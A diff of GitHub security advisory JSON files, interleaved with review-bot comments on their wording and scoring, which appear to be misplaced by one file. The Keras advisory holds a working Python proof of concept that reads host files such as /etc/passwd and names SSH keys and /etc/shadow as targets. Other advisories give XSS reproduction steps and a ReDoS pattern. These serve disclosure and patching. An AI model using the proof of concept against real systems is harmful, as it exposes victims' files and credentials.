"github_reviewed_at": "2026-02-18T22:44:33Z", + "nvd_published_at": "2026-02-20T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json b/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json new file mode 100644 index 0000000000000..1bdceda443b82 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json 
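Review bot: The `details` still carry pre-release drafting text that is wrong now that the `v2026.2.15` tag appears in this hunk's `references`: the line `Fixed in: >= 2026.2.15 (next release; fix is already merged on main)` and the whole `## Release Process Note` paragraph; the paragraph should be dropped and the line reduced to `Fixed in: >= 2026.2.15`. The Details section has also lost its markup in this rendering (the phrase reads "into an inline `` could break out"), so the sentence no longer names what was injected; it should say plainly that `assistantName`/`assistantAvatar` were interpolated into an inline script element and a closing script tag inside them terminated it. The fix pairs a JSON bootstrap endpoint with `script-src 'self'`; it is worth confirming that endpoint is served as `application/json` with `X-Content-Type-Options: nosniff`, since the same attacker-controlled strings otherwise remain same-origin content that a CSP of this shape does not by itself forbid loading.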
@@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c9r-7f29-qp32", + "modified": "2026-02-19T19:34:56Z", + "published": "2026-02-16T12:30:24Z", + "aliases": [ + "CVE-2026-0999" + ], + "summary": "Mattermost fails to properly validate login method restrictions", + "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to properly validate login method restrictions which allows an authenticated user to bypass SSO-only login requirements via userID-based authentication. Mattermost Advisory ID: MMSA-2025-00548", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost/server/v8" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.0.0-20251212052346-61651b0df7ea" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.1.3" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.11.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 10.11.10" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.2.2" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": 
"5.3.2-0.20251212052346-61651b0df7ea" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0999" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost/commit/61651b0df7ea5db55d1e54f8d6fb5fce4149309c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-303" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:34:56Z", + "nvd_published_at": "2026-02-16T10:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json index 54ea267f43b37..6dbb90ce41f2d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json +++ b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3fqr-4cg8-h96q", - "modified": "2026-02-18T00:53:59Z", + "modified": "2026-02-20T16:46:03Z", "published": "2026-02-18T00:53:59Z", "aliases": [ "CVE-2026-26317" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fqr-4cg8-h96q" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26317" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/b566b09f81e2b704bf9398d8d97d5f7a90aa94c3" @@ -79,6 +83,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:53:59Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:47Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json new file mode 100644 index 0000000000000..e37f0549714c9 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json 
@@ -0,0 +1,90 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jh3-prx3-w6wc", + "modified": "2026-02-24T16:08:41Z", + "published": "2026-02-23T22:15:03Z", + "aliases": [ + "CVE-2026-27126" + ], + "summary": "Craft CMS has Stored XSS in Table Field via \"HTML\" Column Type", + "details": "A stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `html` column type. The application fails to sanitize the input, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.\n\n## Prerequisites\n* An administrator account\n* `allowAdminChanges` must be enabled in production, which is [against our security recommendations](https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production).\n\n## Steps to Reproduce\n1. Navigate to **Settings** → **Fields** and create a new field with Type: **Table**\n1. Add a **Column Heading** and set **Column Type** to `Single-line text`\n - **Note:** The vulnerable **Column Type** is `html`, but it's not available in the UI dropdown.\n1. In **Default Values** section, add a row with the following payload:\n ```html\n \n ```\n1. Enable `Static Rows`\n1. Intercept the **Save Field** request using a proxy tool (e.g., Burp Suite) or use `cURL` directly\n1. Modify the request body and change the `types[craft-fields-Table][columns][col3][type]` parameter from `singleline` to `html`\n1. Forward the request to save the field\n1. Use the field in any object (e.g. user profile fields) → then visit the any user's profile\n1. Notice the XSS execution\n1. 
The XSS will also trigger when an administrator attempts to edit this field, as the malicious payload is executed within the field configuration page, too.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0-RC1" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27126" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:15:03Z", + "nvd_published_at": "2026-02-24T03:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json b/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json new file mode 100644 index 0000000000000..2ffb92e093878 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json 
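Review bot: The `Prerequisites` paragraph requires an administrator account with `allowAdminChanges` enabled, but the CVSS v4 vector scores `PR:L`; an administrator precondition is `PR:H`, so either the vector or the prerequisite text is wrong, and `AT:P` alone (the `allowAdminChanges` requirement) does not stand in for the privilege level. The reproduction's payload fence is empty in this rendering because the HTML was stripped, so step 3 (`add a row with the following payload`) no longer shows anything; describing it in words, e.g. `a script element or an element with an on-event handler attribute`, would survive sanitization. MODERATE severity is defensible either way given the admin-only precondition.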
@@ -0,0 +1,97 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3m4q-jmj6-r34q", + "modified": "2026-02-18T22:41:58Z", + "published": "2026-02-18T22:41:58Z", + "aliases": [ + "CVE-2026-1669" + ], + "summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading", + "details": "## Summary\n\nTensorFlow / Keras continues to honor HDF5 “external storage” and `ExternalLink` features when loading weights. A malicious `.weights.h5` (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (`tensorflow 2.20.0`, `keras 3.11.3`, `h5py 3.15.1`, `numpy 2.3.4`).\n\n## Impact\n\n- **Class**: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)\n- **What leaks**: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).\n- **Visibility**: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.\n- **Prerequisites**: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.\n- **Scope**: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.\n\n## Attacker Scenario\n\n1. **Initial foothold**: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.\n2. 
**Crafted payload**: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home//.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).\n3. **Execution**: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.\n4. **Exfiltration vectors**:\n - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.\n - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.\n - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.\n\n### Additional Preconditions\n\n- The target file must exist and be readable by the process running TensorFlow/Keras.\n- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.\n- Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.\n\n## Environment Used for Verification (2025‑10‑19)\n\n- OS: Debian-based container running Python 3.11.\n- Packages (installed via `python -m pip install -U ...`):\n - `tensorflow==2.20.0`\n - `keras==3.11.3`\n - `h5py==3.15.1`\n - `numpy==2.3.4`\n- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.\n- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to 
capture verbose logs if needed.\n\n## Reproduction Instructions (Weights-Only PoC)\n\n1. Ensure the environment above (or equivalent) is prepared.\n2. Save the following script as `weights_external_demo.py`:\n\n```python\nfrom __future__ import annotations\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport tensorflow as tf\nimport h5py\n\ndef choose_host_file() -> Path:\n candidates = [\n os.environ.get(\"KFLI_PATH\"),\n \"/etc/machine-id\",\n \"/etc/hostname\",\n \"/proc/sys/kernel/hostname\",\n \"/etc/passwd\",\n ]\n for candidate in candidates:\n if not candidate:\n continue\n path = Path(candidate)\n if path.exists() and path.is_file():\n return path\n raise FileNotFoundError(\"set KFLI_PATH to a readable file\")\n\ndef build_model(units: int) -> tf.keras.Model:\n model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=(1,), name=\"input\"),\n tf.keras.layers.Dense(units, activation=None, use_bias=True, name=\"dense\"),\n ])\n model(tf.zeros((1, 1))) # build weights\n return model\n\ndef find_bias_dataset(h5file: h5py.File) -> str:\n matches: list[str] = []\n def visit(name: str, obj) -> None:\n if isinstance(obj, h5py.Dataset) and name.endswith(\"bias:0\"):\n matches.append(name)\n h5file.visititems(visit)\n if not matches:\n raise RuntimeError(\"bias dataset not found\")\n return matches[0]\n\ndef rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:\n with h5py.File(path, \"r+\") as h5file:\n bias_path = find_bias_dataset(h5file)\n parent = h5file[str(Path(bias_path).parent)]\n dset_name = Path(bias_path).name\n del parent[dset_name]\n max_bytes = 128\n size = host_file.stat().st_size\n nbytes = min(size, max_bytes)\n nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing\n units = max(1, nbytes // 4)\n parent.create_dataset(\n dset_name,\n shape=(units,),\n dtype=\"float32\",\n external=[(host_file.as_posix(), 0, nbytes)],\n )\n return units, nbytes\n\ndef floats_to_ascii(arr: np.ndarray) -> tuple[str, 
str]:\n raw = np.ascontiguousarray(arr).view(np.uint8)\n ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode(\"ascii\", \"ignore\")\n hex_preview = raw[:64].tobytes().hex()\n return ascii_preview, hex_preview\n\ndef main() -> None:\n host_file = choose_host_file()\n model = build_model(units=32)\n\n weights_path = Path(\"weights_demo.h5\")\n model.save_weights(weights_path.as_posix())\n\n units, nbytes = rewrite_bias_external(weights_path, host_file)\n print(\"secret_text_source\", host_file)\n print(\"units\", units, \"bytes_mapped\", nbytes)\n\n model.load_weights(weights_path.as_posix())\n output = model.predict(tf.zeros((1, 1)), verbose=0)[0]\n ascii_preview, hex_preview = floats_to_ascii(output)\n print(\"recovered_ascii\", ascii_preview)\n print(\"recovered_hex64\", hex_preview)\n\n saved = Path(\"weights_demo_resaved.h5\")\n model.save_weights(saved.as_posix())\n print(\"resaved_weights\", saved.as_posix())\n\nif __name__ == \"__main__\":\n main()\n```\n\n3. Execute `python weights_external_demo.py`.\n4. Observe:\n - `secret_text_source` prints the chosen host file path.\n - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.\n - A re-saved weights file contains the leaked bytes inside the artifact.\n\n## Expanded Validation (Multiple Attack Scenarios)\n\nThe following test harness generalises the attack for multiple HDF5 constructs:\n\n- Build a minimal feed-forward model and baseline weights.\n- Create three malicious variants:\n 1. **External storage dataset**: dataset references `/etc/hosts`.\n 2. **External link**: `ExternalLink` pointing at `/etc/passwd`.\n 3. 
**Indirect link**: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.\n- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.\n- Post-process traces and weight tensors to show the exact bytes loaded.\n\nRelevant syscall excerpts captured during the run:\n\n```\nopenat(AT_FDCWD, \"/etc/hosts\", O_RDONLY|O_CLOEXEC) = 7\nread(7, \"127.0.0.1 localhost\\n\", 64) = 21\n...\nopenat(AT_FDCWD, \"/etc/passwd\", O_RDONLY|O_CLOEXEC) = 9\nread(9, \"root:x:0:0:root:/root:/bin/bash\\n\", 64) = 32\n...\nopenat(AT_FDCWD, \"/etc/hostname\", O_RDONLY|O_CLOEXEC) = 8\nread(8, \"example-host\\n\", 64) = 13\n```\n\nThe corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.\n\n## Recommended Product Fix\n\n1. **Default-deny external datasets/links**:\n - Inspect creation property lists (`get_external_count`) before materialising tensors.\n - Resolve `SoftLink` / `ExternalLink` targets and block if they leave the HDF5 file.\n2. **Provide an escape hatch**:\n - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.\n3. **Documentation**:\n - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.\n4. 
**Regression coverage**:\n - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.\n\n## Workarounds\n\n- Avoid loading untrusted HDF5 weight files.\n- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.\n- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.\n- If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.\n\n## Timeline (UTC)\n\n- **2025‑10‑18**: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.\n- **2025‑10‑19**: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.13.0" + }, + { + "fixed": "3.13.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.12.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/pull/22057" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553" + }, + { + "type": "PACKAGE", + "url": "https://github.com/keras-team/keras" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/releases/tag/v3.12.1" + }, + { + "type": 
"WEB", + "url": "https://github.com/keras-team/keras/releases/tag/v3.13.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:41:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json new file mode 100644 index 0000000000000..e62b787b379c0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json 
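Review bot: The `affected` array in this hunk lists only the PyPI `keras` package, yet the Scope line in `details` states that TensorFlow 2.x lines are affected and the PoC calls `tf.keras.models.load_model()`; if the `tensorflow` wheel ships its own copy of the HDF5 weight loader, consumers that depend only on `tensorflow` will never be matched against this advisory, so either add a `tensorflow` entry with the applicable fixed version or narrow the Scope text to the standalone `keras` package. The two ranges are also ordered newest-first (`3.13.0`–`3.13.2` before `3.0.0`–`3.12.1`), which is valid but inconsistent with the other advisories in this commit. In the Attacker Scenario text the path `/home//.ssh/id_rsa` has a doubled slash, which looks like a stripped placeholder; rendering it as `/home/USER/.ssh/id_rsa` keeps the example readable.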
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3ppc-4f35-3m26", + "modified": "2026-02-20T16:52:14Z", + "published": "2026-02-18T22:38:11Z", + "aliases": [ + "CVE-2026-26996" + ], + "summary": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern", + "details": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) — exponential.\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. 
This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "minimatch" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "10.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996" + }, + { + "type": "WEB", + "url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/isaacs/minimatch" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:38:11Z", + "nvd_published_at": "2026-02-20T03:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-42p5-62qq-mmh7/GHSA-42p5-62qq-mmh7.json b/advisories/github-reviewed/2026/02/GHSA-42p5-62qq-mmh7/GHSA-42p5-62qq-mmh7.json new file mode 100644 index 0000000000000..be376a074bea3 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-42p5-62qq-mmh7/GHSA-42p5-62qq-mmh7.json 
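Review bot: The `details` field still carries the unfilled GitHub advisory template text under `### Details` (`_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._`), which should be removed or replaced with the pointer to the pattern-compilation code that the PoC section describes. The `### Impact` heading is also not separated from the preceding paragraph by a blank line, so the rendered markdown runs the two sections together. The single range `introduced 0` / `fixed 10.2.1` marks every earlier major line as vulnerable; if fixes were backported to older majors, add one range per line so consumers pinned to them are not told to cross a major version.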
@@ -0,0 +1,411 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42p5-62qq-mmh7", + "modified": "2026-02-24T15:44:47Z", + "published": "2026-02-24T15:44:47Z", + "aliases": [ + "CVE-2026-25987" + ], + "summary": "ImageMagick has a heap buffer over-read in its MAP image decoder", + "details": "A heap buffer over-read vulnerability exists in the MAP image decoder when processing crafted MAP files, potentially leading to crashes or unintended memory disclosure during image decoding.\n\n```\n=================================================================\n==4070926==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000002b31 at pc 0x56517afbd910 bp 0x7ffc59e90000 sp 0x7ffc59e8fff0\nREAD of size 1 at 0x502000002b31 thread T0\n```", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": 
"NuGet", + "name": "Magick.NET-Q16-HDRI-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-OpenMP-arm64" + }, + "ranges": [ + { + "type": 
"ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": 